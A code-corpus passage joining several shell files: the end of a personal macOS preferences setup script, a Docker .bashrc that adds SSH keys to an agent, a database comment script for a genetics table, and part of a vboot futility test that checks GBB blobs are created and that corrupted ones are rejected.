defaults write com.apple.ActivityMonitor ShowCategory -int 0
# Disable all actions when inserting disks
defaults write com.apple.digihub com.apple.digihub.blank.bd.appeared -dict-add action -int 1
defaults write com.apple.digihub com.apple.digihub.blank.cd.appeared -dict-add action -int 1
defaults write com.apple.digihub com.apple.digihub.blank.dvd.appeared -dict-add action -int 1
defaults write com.apple.digihub com.apple.digihub.cd.music.appeared -dict-add action -int 1
defaults write com.apple.digihub com.apple.digihub.dvcamera.IIDC.appeared -dict-add action -int 1
defaults write com.apple.digihub com.apple.digihub.dvcamera.IIDC.irisopened -dict-add action -int 1
defaults write com.apple.digihub com.apple.digihub.dvd.video.appeared -dict-add action -int 1
# Enable the debug menu in Disk Utility
defaults write com.apple.DiskUtility DUDebugMenuEnabled -bool true
defaults write com.apple.DiskUtility advanced-image-options -bool true
# Enable HiDPI display modes (requires restart)"
sudo defaults write /Library/Preferences/com.apple.windowserver DisplayResolutionEnabled -bool true
###############################################################################
# PMSET - NVRAM - SYSTEMSETUP #
###############################################################################
# Disable Sudden Motion Sensor
sudo pmset -a sms 0
# Disable hibernation (speeds up entering sleep mode)
sudo pmset -a hibernatemode 0
# Set standby delay to 24 hours
sudo pmset -a standbydelay 86400
# Disable sleep
sudo pmset -a sleep 0
# Disable disk spindown timer
sudo pmset -a disksleep 0
# Set display sleep to 1 minute
sudo pmset -a displaysleep 1
# Disable wake on ethernet magic packet
sudo pmset -a womp 0
# Disable autorestart on power loss
sudo pmset -a autorestart 0
# Disable slightly turn down display brightness on battery
sudo pmset -a lessbright 0
# Disable the sound effects on boot
sudo nvram SystemAudioVolume=" "
# Never go into computer sleep mode
sudo systemsetup -setcomputersleep Off > /dev/null
###############################################################################
# SSD Tweaks #
###############################################################################
# Disable Creation of .DS_Store Files on Network Volumes
defaults write com.apple.desktopservices DSDontWriteNetworkStores -bool true
# Disable Creation of .DS_Store Files on USB Volumes
defaults write com.apple.desktopservices DSDontWriteUSBStores -bool true
# Save screenshots to the RamDisk
defaults write com.apple.screencapture location -string "/Volumes/RamDisk"
# Save screenshots in PNG format (other options: BMP, GIF, JPG, PDF, TIFF)
defaults write com.apple.screencapture type -string "png"
# Disable shadow in screenshots
defaults write com.apple.screencapture disable-shadow -bool true
###############################################################################
# Time Machine #
###############################################################################
# Time machine backup disable
sudo tmutil disable
# Prevent Time Machine from Prompting to use new HD as backup
sudo defaults write /Library/Preferences/com.apple.TimeMachine DoNotOfferNewDisksForBackup -bool true
###############################################################################
# Trackpad #
###############################################################################
# Enable tap to click for this user and for the login screen
defaults write com.apple.driver.AppleBluetoothMultitouch.trackpad Clicking -bool true
defaults -currentHost write NSGlobalDomain com.apple.mouse.tapBehavior -int 1
# Disable three finger tap
defaults write com.apple.driver.AppleBluetoothMultitouch.trackpad TrackpadThreeFingerTapGesture -int 0
defaults -currentHost write NSGlobalDomain com.apple.trackpad.threeFingerTapGesture -int 0
# Trackpad: 'smart zoom' two finger double tap
defaults write com.apple.driver.AppleBluetoothMultitouch.trackpad TrackpadTwoFingerDoubleTapGesture -int 0
defaults -currentHost write NSGlobalDomain com.apple.trackpad.twoFingerDoubleTapGesture -int 0
# Trackpad: disable swipe from right to show notification center
defaults write com.apple.driver.AppleBluetoothMultitouch.trackpad TrackpadTwoFingerFromRightEdgeSwipeGesture -int 0
defaults -currentHost write NSGlobalDomain com.apple.trackpad.twoFingerFromRightEdgeSwipeGesture -int 0
# Mouse: TwoButton mouse
defaults write com.apple.driver.AppleBluetoothMultitouch.mouse.plist MouseButtonMode -string "TwoButton"
# Map bottom right corner to right-click [To be checked]
defaults write com.apple.driver.AppleBluetoothMultitouch.trackpad TrackpadCornerSecondaryClick -int 2
defaults write com.apple.driver.AppleBluetoothMultitouch.trackpad TrackpadRightClick -bool true
defaults -currentHost write NSGlobalDomain com.apple.trackpad.trackpadCornerClickBehavior -int 1
defaults -currentHost write NSGlobalDomain com.apple.trackpad.enableSecondaryClick -bool true
# Disable “natural” (Lion-style) scrolling
defaults write -g com.apple.swipescrolldirection -bool false
# Disable El Capitan shake to magnify cursor
defaults write NSGlobalDomain CGDisableCursorLocationMagnification -bool true
# Set speed to 5
defaults write -g com.apple.mouse.scaling 5
###############################################################################
# Keyboard #
###############################################################################
# Disable automatic capitalization as it’s annoying when typing code
defaults write NSGlobalDomain NSAutomaticCapitalizationEnabled -bool false
# Disable smart dashes as they’re annoying when typing code
defaults write NSGlobalDomain NSAutomaticDashSubstitutionEnabled -bool false
# Disable automatic period substitution as it’s annoying when typing code
defaults write NSGlobalDomain NSAutomaticPeriodSubstitutionEnabled -bool false
# Disable smart quotes as they’re annoying when typing code
defaults write NSGlobalDomain NSAutomaticQuoteSubstitutionEnabled -bool false
# Disable auto-correct
defaults write NSGlobalDomain NSAutomaticSpellingCorrectionEnabled -bool false
# Enable full keyboard access for all controls
# (e.g. enable Tab in modal dialogs)
defaults write NSGlobalDomain AppleKeyboardUIMode -int 3
# Use scroll gesture with the Command modifier key to zoom
defaults -currentHost write com.apple.universalaccess closeViewScrollWheelModifiersInt 1048576
defaults -currentHost write com.apple.universalaccess closeViewScrollWheelPreviousToggle 1
defaults -currentHost write com.apple.universalaccess closeViewScrollWheelToggle 1
# Disable press-and-hold for keys in favor of key repeat
defaults write NSGlobalDomain ApplePressAndHoldEnabled -bool false
# Set a blazingly fast keyboard repeat rate
defaults write NSGlobalDomain KeyRepeat -int 2
defaults write NSGlobalDomain InitialKeyRepeat -int 15
###############################################################################
# Finder #
###############################################################################
# Unhide User Library Folder
chflags nohidden ~/Library
# Unhide Volumes Folder
sudo chflags nohidden /Volumes
# Desktop Show Internal Media
defaults write com.apple.finder ShowHardDrivesOnDesktop -bool true
# Desktop Show External Media
defaults write com.apple.finder ShowExternalHardDrivesOnDesktop -bool true
# Desktop Show Mounted Server
defaults write com.apple.finder ShowMountedServersOnDesktop -bool false
# Desktop Show Removable Media
defaults write com.apple.finder ShowRemovableMediaOnDesktop -bool true
# Allow text selection in QuickLook
defaults write com.apple.finder QLEnableTextSelection -bool true
# Don't use tabs in Finder
defaults write com.apple.finder AppleWindowTabbingMode -string "manual"
# Show status bar
defaults write com.apple.finder ShowStatusBar -bool false
# Show path bar
defaults write com.apple.finder ShowPathbar -bool true
# Display full POSIX path as Finder window title
defaults write com.apple.finder _FXShowPosixPathInTitle -bool true
# Enable spring loading for directories
defaults write -g com.apple.springing.enabled -bool true
# Remove the spring loading delay for directories
defaults write -g com.apple.springing.delay -float 0
# Expand the following File Info panes:
# “General”, “Open with”, and “Sharing & Permissions”
defaults write com.apple.finder FXInfoPanesExpanded -dict General -bool true OpenWith -bool true Privileges -bool true
# Set default Finder path
# For desktop, use `PfDe`
# For other paths, use `PfLo` and `file:///full/path/here/`
defaults write com.apple.finder NewWindowTarget -string "PfHm"
defaults write com.apple.finder NewWindowTargetPath -string "file://${HOME}/"
# Show all filename extensions
defaults write NSGlobalDomain AppleShowAllExtensions -bool true
# When performing a search, search the current folder by default
defaults write com.apple.finder FXDefaultSearchScope -string "SCcf"
# Keep folders on top when sorting by name
defaults write com.apple.finder _FXSortFoldersFirst -bool true
# Disable the warning when changing a file extension
defaults write com.apple.finder FXEnableExtensionChangeWarning -bool false
# Enable snap-to-grid for icons on the desktop and in other icon views
/usr/libexec/PlistBuddy -c "Set :DesktopViewSettings:IconViewSettings:arrangeBy grid" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :FK_StandardViewSettings:IconViewSettings:arrangeBy name" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :StandardViewSettings:IconViewSettings:arrangeBy name" ~/Library/Preferences/com.apple.finder.plist
# Set grid spacing for icons on the desktop and in other icon views
/usr/libexec/PlistBuddy -c "Set :DesktopViewSettings:IconViewSettings:gridSpacing 28" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :FK_StandardViewSettings:IconViewSettings:gridSpacing 28" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :StandardViewSettings:IconViewSettings:gridSpacing 28" ~/Library/Preferences/com.apple.finder.plist
# Set the size of icons on the desktop and in other icon views
/usr/libexec/PlistBuddy -c "Set :DesktopViewSettings:IconViewSettings:iconSize 48" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :FK_StandardViewSettings:IconViewSettings:iconSize 48" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :StandardViewSettings:IconViewSettings:iconSize 48" ~/Library/Preferences/com.apple.finder.plist
# Remove all tags from contextual menu
/usr/libexec/PlistBuddy -c "Delete :FavoriteTagNames" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Add :FavoriteTagNames array" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Add :FavoriteTagNames:0 string" ~/Library/Preferences/com.apple.finder.plist
# Configure Finder Toolbar
/usr/libexec/PlistBuddy -c "Delete :NSToolbar\\ Configuration\\ Browser:TB\\ Item\\ Identifiers" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Add :NSToolbar\\ Configuration\\ Browser:TB\\ Item\\ Identifiers array" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Add :NSToolbar\\ Configuration\\ Browser:TB\\ Item\\ Identifiers:0 string com.apple.finder.BACK" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Add :NSToolbar\\ Configuration\\ Browser:TB\\ Item\\ Identifiers:1 string NSToolbarFlexibleSpaceItem" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Add :NSToolbar\\ Configuration\\ Browser:TB\\ Item\\ Identifiers:2 string com.apple.finder.SWCH" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Add :NSToolbar\\ Configuration\\ Browser:TB\\ Item\\ Identifiers:3 string NSToolbarFlexibleSpaceItem" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Add :NSToolbar\\ Configuration\\ Browser:TB\\ Item\\ Identifiers:4 string com.apple.finder.SRCH" ~/Library/Preferences/com.apple.finder.plist
# Use list view in all Finder windows by default
# Flwv: Cover Flow View
# Nlsv: List View
# clmv: Column View
# icnv: Icon View
defaults write com.apple.finder FXPreferredViewStyle -string "Nlsv"
# Setting up Finder Sidebar
python - <<EOF
from FinderSidebarEditor import FinderSidebar
sidebar = FinderSidebar()
sidebar.removeAll()
sidebar.add("$HOME/Projects")
sidebar.add("$HOME/Dropbox")
sidebar.add("$HOME/Documents")
sidebar.add("$HOME/Desktop")
sidebar.add("/Applications")
sidebar.add("$HOME")
sidebar.add("/Volumes/Mojave")
EOF
# Removing .DS_Store files
echo "Removing .DS_Store files everywhere to update PreferredViewStyle in all directories... (this may take a while)"
sudo find / -name .DS_Store -delete 2> /dev/null
# Speed up Mission Control animations
defaults write com.apple.dock expose-animation-duration -float 0.1
# Don’t group windows by application in Mission Control
defaults write com.apple.dock expose-group-by-app -bool false
# Show Dashboard as a Space
defaults write com.apple.dashboard db-enabled-state -int 3
# Don’t automatically rearrange Spaces based on most recent use
defaults write com.apple.dock mru-spaces -bool false
# Don’t show recent applications in Dock
defaults write com.apple.dock show-recents -bool false
# Hot corners
# Possible values:
# 0: no-op
# 2: Mission Control
# 3: Show application windows
# 4: Desktop
# 5: Start screen saver
# 6: Disable screen saver
# 7: Dashboard
# 10: Put display to sleep
# 11: Launchpad
# 12: Notification Center
# Top left screen corner -> Mission Control
defaults write com.apple.dock wvous-tl-corner -int 2
defaults write com.apple.dock wvous-tl-modifier -int 0
# Top right screen corner -> Dashboard
defaults write com.apple.dock wvous-tr-corner -int 7
defaults write com.apple.dock wvous-tr-modifier -int 0
# Bottom Right screen corner -> Desktop
defaults write com.apple.dock wvous-br-corner -int 4
defaults write com.apple.dock wvous-br-modifier -int 0
# Install iStatPro and configure it
tar -xvzf iStatPro.wdgt.tar.gz -C ~/Library/Widgets/.
plutil -convert binary1 -o - "./preferences/widget-com.iSlayer.iStatpro4.widget.plist" > ~/"Library/Preferences/widget-com.iSlayer.iStatpro4.widget.plist"
plutil -convert binary1 -o - "./preferences/com.apple.dashboard.plist" > ~/"Library/Preferences/com.apple.dashboard.plist"
###############################################################################
# Dock #
###############################################################################
# Set the icon size of Dock items to 32 pixels
defaults write com.apple.dock tilesize -int 32
# Change minimize/maximize window effect
defaults write com.apple.dock mineffect -string "scale"
# Minimize windows into their application’s icon
defaults write com.apple.dock minimize-to-application -bool true
# Enable spring loading for all Dock items
defaults write com.apple.dock enable-spring-load-actions-on-all-items -bool true
# Automatically hide and show the Dock
defaults write com.apple.dock autohide -bool false
# Set Dock zoom size
defaults write com.apple.dock magnification -int 0
# Lock dock size
defaults write com.apple.Dock size-immutable -bool yes
# Disable bouncing
defaults write com.apple.dock no-bouncing -bool true
# Rearrange icons in dock
dockutil --remove all
dockutil --add "/Applications/Safari.app"
dockutil --add "/Applications/Telegram Desktop.app"
dockutil --add "/Applications/WhatsApp.app"
dockutil --add "/Applications/Discord.app"
dockutil --add "/Applications/TextEdit.app"
dockutil --add "/Applications/Notes.app"
dockutil --add "/Applications/Calendar.app"
dockutil --add "/Applications/Maps.app"
dockutil --add "/Applications/iTunes.app"
dockutil --add "/Applications/App Store.app"
dockutil --add "/Applications/System Preferences.app"
dockutil --add "/Applications/Utilities/Terminal.app"
dockutil --add "/Applications/HSTracker.app"
dockutil --add "/Applications/Battle.net.app"
dockutil --add "/Applications/Typora.app"
dockutil --add "/Applications/Sublime Text.app"
dockutil --add "/Applications" --view grid --display folder --sort name
dockutil --add "$HOME/Projects" --view grid --display folder --sort name
dockutil --add "$HOME/Downloads" --view grid --display folder --sort dateadded
###############################################################################
# Spotlight #
###############################################################################
sudo defaults write /.Spotlight-V100/VolumeConfiguration Exclusions -array "/Volumes"
# Change indexing order and disable some search results
# Yosemite-specific search results (remove them if you are using macOS 10.9 or older):
# MENU_DEFINITION
# MENU_CONVERSION
# MENU_EXPRESSION
# MENU_SPOTLIGHT_SUGGESTIONS (send search queries to Apple)
# MENU_WEBSEARCH (send search queries to Apple)
# MENU_OTHER
defaults write com.apple.spotlight orderedItems -array \
'{"enabled" = 1; "name" = "APPLICATIONS";}' \
'{"enabled" = 1; "name" = "SYSTEM_PREFS";}' \
'{"enabled" = 1; "name" = "PDF";}' \
'{"enabled" = 1; "name" = "MENU_EXPRESSION";}' \
'{"enabled" = 1; "name" = "MENU_DEFINITION";}' \
'{"enabled" = 0; "name" = "SOURCE";}' \
'{"enabled" = 0; "name" = "MENU_OTHER";}' \
'{"enabled" = 0; "name" = "MENU_SPOTLIGHT_SUGGESTIONS";}' \
'{"enabled" = 0; "name" = "MENU_CONVERSION";}' \
'{"enabled" = 0; "name" = "DOCUMENTS";}' \
'{"enabled" = 0; "name" = "DIRECTORIES";}' \
'{"enabled" = 0; "name" = "PRESENTATIONS";}' \
'{"enabled" = 0; "name" = "SPREADSHEETS";}' \
'{"enabled" = 0; "name" = "MESSAGES";}' \
'{"enabled" = 0; "name" = "CONTACT";}' \
'{"enabled" = 0; "name" = "EVENT_TODO";}' \
'{"enabled" = 0; "name" = "IMAGES";}' \
'{"enabled" = 0; "name" = "BOOKMARKS";}' \
'{"enabled" = 0; "name" = "MUSIC";}' \
'{"enabled" = 0; "name" = "MOVIES";}' \
'{"enabled" = 0; "name" = "FONTS";}'
# Load new settings before rebuilding the index
killall mds > /dev/null 2>&1
# Make sure indexing is enabled for the main volume
sudo mdutil -i on / > /dev/null
# Rebuild the index from scratch
sudo mdutil -E / > /dev/null
###############################################################################
# Textedit #
###############################################################################
# Textedit PlainTextMode enable
defaults write com.apple.TextEdit RichText -int 0
# Open and save files as UTF-8 in TextEdit
defaults write com.apple.TextEdit PlainTextEncoding -int 4
defaults write com.apple.TextEdit PlainTextEncodingForWrite -int 4
###############################################################################
# Safari [Doesn't Work anymore] #
###############################################################################
# Tell Safari to open new window links in tabs
# defaults write com.apple.Safari TargetedClicksCreateTabs -bool true
# # Reduce delay when rendering pages
# defaults write com.apple.Safari WebKitInitialTimedLayoutDelay 0.1
# # Show the full URL in the address bar (note: this still hides the scheme)
# defaults write com.apple.Safari ShowFullURLInSmartSearchField -bool true
# # Copy email addresses as `foo@example.com` instead of `Foo Bar <foo@example.com>` in Mail.app
# defaults write com.apple.mail AddressesIncludeNameOnPasteboard -bool false
# # Safari Developer and Debug menus
# defaults write com.apple.Safari IncludeInternalDebugMenu -bool true && \
# defaults write com.apple.Safari IncludeDevelopMenu -bool true && \
# defaults write com.apple.Safari WebKitDeveloperExtrasEnabledPreferenceKey -bool true && \
# defaults write com.apple.Safari com.apple.Safari.ContentPageGroupIdentifier.WebKit2DeveloperExtrasEnabled -bool true && \
# defaults write -g WebKitDeveloperExtras -bool true
# # Privacy: don’t send search queries to Apple
# defaults write com.apple.Safari UniversalSearchEnabled -bool false
# defaults write com.apple.Safari SuppressSearchSuggestions -bool true
# # Set Safari’s home page to `about:blank` for faster loading
# defaults write com.apple.Safari HomePage -string "about:blank"
# # Prevent Safari from opening ‘safe’ files automatically after downloading
# defaults write com.apple.Safari AutoOpenSafeDownloads -bool false
# # Show Safari’s favorites bar by default
# defaults write com.apple.Safari ShowFavoritesBar -bool true
# # Remove useless icons from Safari’s bookmarks bar
# defaults write com.apple.Safari ProxiesInBookmarksBar "()"
# # Hide Safari’s sidebar in Top Sites
# defaults write com.apple.Safari ShowSidebarInTopSites -bool false
# # Warn about fraudulent websites
# defaults write com.apple.Safari WarnAboutFraudulentWebsites -bool true
# # Disable Java
# defaults write com.apple.Safari WebKitJavaEnabled -bool false
# defaults write com.apple.Safari com.apple.Safari.ContentPageGroupIdentifier.WebKit2JavaEnabled -bool false
# # Block pop-up windows
# defaults write com.apple.Safari WebKitJavaScriptCanOpenWindowsAutomatically -bool false
# defaults write com.apple.Safari com.apple.Safari.ContentPageGroupIdentifier.WebKit2JavaScriptCanOpenWindowsAutomatically -bool false
# # Enable “Do Not Track”
# defaults write com.apple.Safari SendDoNotTrackHTTPHeader -bool true
# # Update extensions automatically
# defaults write com.apple.Safari InstallExtensionUpdatesAutomatically -bool true
###############################################################################
# Photos #
###############################################################################
# Prevent Photos from opening automatically when devices are plugged in
defaults -currentHost write com.apple.ImageCapture disableHotPlug -bool true
###############################################################################
# iTunes #
###############################################################################
# stop running an automatic backup when you plug in an iOS device
defaults write com.apple.iTunes AutomaticDeviceBackupsDisabled -bool true
###############################################################################
# Transmission.app #
###############################################################################
# Use `/Volumes/RamDisk` to store incomplete downloads
defaults write org.m0k.transmission UseIncompleteDownloadFolder -bool true
defaults write org.m0k.transmission IncompleteDownloadFolder -string "/Volumes/RamDisk"
# Don’t prompt for confirmation before downloading
defaults write org.m0k.transmission DownloadAsk -bool false
defaults write org.m0k.transmission MagnetOpenAsk -bool false
# Trash original torrent files
defaults write org.m0k.transmission DeleteOriginalTorrent -bool false
# Hide the donate message
defaults write org.m0k.transmission WarningDonate -bool false
# Hide the legal disclaimer
defaults write org.m0k.transmission WarningLegal -bool false
# IP block list.
# Source: https://giuliomac.wordpress.com/2014/02/19/best-blocklist-for-transmission/
defaults write org.m0k.transmission BlocklistNew -bool true
defaults write org.m0k.transmission BlocklistURL -string "http://john.bitsurge.net/public/biglist.p2p.gz"
defaults write org.m0k.transmission BlocklistAutoUpdate -bool true
# Randomize port on launch
defaults write org.m0k.transmission RandomPort -bool true
###############################################################################
# Updates #
###############################################################################
# Disable automatic update & download
sudo defaults write /Library/Preferences/com.apple.SoftwareUpdate AutomaticCheckEnabled -bool false
sudo defaults write /Library/Preferences/com.apple.SoftwareUpdate AutomaticDownload -bool false
sudo defaults write /Library/Preferences/com.apple.SoftwareUpdate AutomaticallyInstallMacOSUpdates -bool false
sudo defaults write /Library/Preferences/com.apple.SoftwareUpdate CriticalUpdateInstall -bool false
sudo defaults write /Library/Preferences/com.apple.SoftwareUpdate AutomaticDownload -bool
sudo /usr/sbin/softwareupdate --ignore "macOS Catalina"
defaults write com.apple.systempreferences AttentionPrefBundleIDs 0
###############################################################################
# Security #
###############################################################################
# Disable remote apple events
sudo systemsetup -setremoteappleevents off
# Disable remote login
sudo systemsetup -setremotelogin off
# Disable wake-on LAN
sudo systemsetup -setwakeonnetworkaccess off
# Do not show password hints
sudo defaults write /Library/Preferences/com.apple.loginwindow RetriesUntilHint -int 0
# Disable guest account login
sudo defaults write /Library/Preferences/com.apple.loginwindow GuestEnabled -bool false
# Disable the “Are you sure you want to open this application?” dialog
defaults write com.apple.LaunchServices LSQuarantine -bool false
# Require password immediately after sleep or screen saver begins
defaults write com.apple.screensaver askForPassword -int 1
defaults write com.apple.screensaver askForPasswordDelay -int 0
osascript -e 'tell application "System Events" to set require password to wake of security preferences to true'
###############################################################################
# Kill affected applications #
###############################################################################
for app in "Activity Monitor" \
"cfprefsd" \
"Dock" \
"Finder" \
"Photos" \
"Safari" \
"SystemUIServer"; do
killall "${app}" &> /dev/null
done
echo "Done. Note that some of these changes require a logout/restart to take effect."
| true
|
e8c4065d2ae53d5a663eb3b0bbf99811b30afbb9
|
Shell
|
leventyalcin/docker_build_scripts
|
/image_src/dev_basic/assets/home/.bashrc
|
UTF-8
| 1,154
| 4.125
| 4
|
[
"MIT"
] |
permissive
|
for script in /etc/profile.d/*.sh ; do
if [ -r $script ] ; then
. $script
fi
done
if [[ -r /etc/profile.d/bash_prompt.sh ]]; then
. /etc/profile.d/bash_prompt.sh
elif [[ -r /etc/profile.d/color_prompt ]]; then
. /etc/profile.d/color_prompt
else
export PS1='\[\033[01;32m\]\h\[\033[01;36m\]\W$ \[\033[00m\]'
fi
function forwardSsh_help() {
cat <<EOM
usage: forwardSsh
... adds all of your .ssh keys to an ssh-agent for the current shell
EOM
}
function forwardSsh() {
echo "... generating agent for ssh forwarding in cluster"
pkill ssh-agent
eval $(ssh-agent)
for privateKey in $(ls -1 $HOME/.ssh/id_* | grep -v '\.pub')
do
addKey "$privateKey"
done
ssh-add -l # verify your key has been added to the key-ring
}
function addKey_help() {
cat <<EOM
usage: addKey </path/to/private_ssh_key>
... adds key to ssh-agent's keyring
e.g.
addKey ~/.ssh/id_rsa
EOM
}
function addKey() {
key="$1"
if [[ -r ${key}.pub ]]; then
echo "... adding key $key"
ssh-add $key
else
echo "... no public key found for $key. Will skip ..."
fi
}
forwardSsh
| true
|
0362dd4a25701639931079fbf61dd852d51b3c01
|
Shell
|
mgijax/pgmgddbschema
|
/comments/MLD_Concordance_create.object
|
UTF-8
| 1,794
| 2.671875
| 3
|
[] |
no_license
|
#!/bin/sh
cd `dirname $0` && . ./Configuration
cat - <<EOSQL | ${PG_DBUTILS}/bin/doisql.csh $0
COMMENT ON TABLE mgd.MLD_Concordance IS 'Defines Concordance values for Hybrid Experiment. The Concordance table contains results for either Markers or Chromosomes. Concordance values are stored as integers which represent the number of Hybrid cells recording the presence/absence of a particular Marker/Chromosome in the Concordance table vs. the presence/absence of the Marker being tested for linkage: -/- (neither present), -/+ (linkage Marker present), +/- (Marker/Chromosome present), +/+ (both present).
Detail of MLD_Hybrid.';
COMMENT ON COLUMN MLD_Concordance.chromosome IS 'chromosome value; is NULL if _Marker_key is not NULL';
COMMENT ON COLUMN MLD_Concordance.cnn IS '-/-; number of Hybrid cells where neither the Concordance Marker/Chromosome nor the linkage Marker is present';
COMMENT ON COLUMN MLD_Concordance.cnp IS '-/+; number of Hybrid cells where the Concordance Marker/Chromosome is not present, but the linkage Marker is present';
COMMENT ON COLUMN MLD_Concordance.cpn IS '+/-; number of Hybrid cells where the Concordance Marker/Chromosome is present, but the linkage Marker is not present';
COMMENT ON COLUMN MLD_Concordance.cpp IS '+/+; number of Hybrid cells where both the Concordance Marker/Chromosome and the linkage Marker are present';
COMMENT ON COLUMN MLD_Concordance.creation_date IS 'date record was created';
COMMENT ON COLUMN MLD_Concordance._Expt_key IS 'foreign key to MLD_Expts';
COMMENT ON COLUMN MLD_Concordance._Marker_key IS 'foreign key to MRK_Marker';
COMMENT ON COLUMN MLD_Concordance.modification_date IS 'date record was last modified';
COMMENT ON COLUMN MLD_Concordance.sequenceNum IS 'sequence number for ordering records';
EOSQL
| true
|
753f9397d59a16ebf6bb93a3867c57f677d962be
|
Shell
|
coreboot/vboot
|
/tests/futility/test_gbb_utility.sh
|
UTF-8
| 9,054
| 3.296875
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash -eux
# Copyright 2014 The ChromiumOS Authors
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
me=${0##*/}
TMP="$me.tmp"
# Work in scratch directory
cd "$OUTDIR"
# Helper utility to modify binary blobs
REPLACE="${BUILD_RUN}/tests/futility/binary_editor"
# First, let's test the basic functionality
# For simplicity, we'll use the same size for all properties.
"${FUTILITY}" gbb -c 16,0x10,16,0x10 "${TMP}.blob"
# Flags
"${FUTILITY}" gbb -s --flags=0xdeadbeef "${TMP}.blob"
"${FUTILITY}" gbb -g --flags "${TMP}.blob" | grep -i 0xdeadbeef
# HWID length should include the terminating null - this is too long
if "${FUTILITY}" gbb -s --hwid="0123456789ABCDEF" "${TMP}.blob"; then
false;
fi
# This works
"${FUTILITY}" gbb -s --hwid="0123456789ABCDE" "${TMP}.blob"
# Read it back?
"${FUTILITY}" gbb -g "${TMP}.blob" | grep "0123456789ABCDE"
# Same kind of tests for the other fields, but they need binary files.
# too long
dd if=/dev/urandom bs=17 count=1 of="${TMP}.data1.toolong"
dd if=/dev/urandom bs=17 count=1 of="${TMP}.data2.toolong"
if "${FUTILITY}" gbb -s --rootkey "${TMP}.data1.toolong" "${TMP}.blob";
then false; fi
if "${FUTILITY}" gbb -s --recoverykey "${TMP}.data2.toolong" "${TMP}.blob";
then false; fi
# shorter than max should be okay, though
dd if=/dev/urandom bs=10 count=1 of="${TMP}.data1.short"
dd if=/dev/urandom bs=10 count=1 of="${TMP}.data2.short"
"${FUTILITY}" gbb -s \
--rootkey "${TMP}.data1.short" \
--recoverykey "${TMP}.data2.short" "${TMP}.blob"
# read 'em back
"${FUTILITY}" gbb -g \
--rootkey "${TMP}.read1" \
--recoverykey "${TMP}.read2" "${TMP}.blob"
# Verify (but remember, it's short)
cmp -n 10 "${TMP}.data1.short" "${TMP}.read1"
cmp -n 10 "${TMP}.data2.short" "${TMP}.read2"
# Okay
dd if=/dev/urandom bs=16 count=1 of="${TMP}.data1"
dd if=/dev/urandom bs=16 count=1 of="${TMP}.data2"
dd if=/dev/urandom bs=16 count=1 of="${TMP}.data3"
"${FUTILITY}" gbb -s --rootkey "${TMP}.data1" "${TMP}.blob"
"${FUTILITY}" gbb -s --recoverykey "${TMP}.data2" "${TMP}.blob"
# Read 'em back.
"${FUTILITY}" gbb -g --rootkey "${TMP}.read1" "${TMP}.blob"
"${FUTILITY}" gbb -g --recoverykey "${TMP}.read2" "${TMP}.blob"
# Verify
cmp "${TMP}.data1" "${TMP}.read1"
cmp "${TMP}.data2" "${TMP}.read2"
# Basic get and set test using flashrom
# The implementation requires an FMAP so use a full firmware image
PEPPY_BIOS="${SCRIPT_DIR}/futility/data/bios_peppy_mp.bin"
cp "${PEPPY_BIOS}" "${TMP}.full.blob"
"${FUTILITY}" gbb -s --emulate="${TMP}.full.blob" --flags="0xdeadbeef"
"${FUTILITY}" gbb -g --emulate="${TMP}.full.blob" --flags | grep -i "0xdeadbeef"
# Okay, creating GBB blobs seems to work. Now let's make sure that corrupted
# blobs are rejected.
# Danger Will Robinson! We assume that ${TMP}.blob has this binary struct:
#
# Field Offset Value
#
# signature: 0x0000 $GBB
# major_version: 0x0004 0x0001
# minor_version: 0x0006 0x0001
# header_size: 0x0008 0x00000080
# flags: 0x000c 0xdeadbeef
# hwid_offset: 0x0010 0x00000080
# hwid_size: 0x0014 0x00000010
# rootkey_offset: 0x0018 0x00000090
# rootkey_size: 0x001c 0x00000010
# bmpfv_offset: 0x0020 0x000000a0
# bmpfv_size: 0x0024 0x00000010
# recovery_key_offset: 0x0028 0x000000b0
# recovery_key_size: 0x002c 0x00000010
# pad: 0x0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
# 0x0040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
# 0x0050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
# 0x0060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
# 0x0070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
# (HWID) 0x0080 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 00
# (rootkey) 0x0090 xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx
# (bmpfv) 0x00a0 xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx
# (recovery_key) 0x00b0 xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx
# 0x00c0 <EOF>
#
# bad major_version
"${REPLACE}" 0x4 2 < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb "${TMP}.blob.bad"; then false; fi
# header size too large
"${REPLACE}" 0x8 0x81 < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb "${TMP}.blob.bad"; then false; fi
# header size too small
"${REPLACE}" 0x8 0x7f < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb "${TMP}.blob.bad"; then false; fi
# HWID not null-terminated is invalid
"${REPLACE}" 0x8f 0x41 < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb "${TMP}.blob.bad"; then false; fi
# HWID of length zero is okay
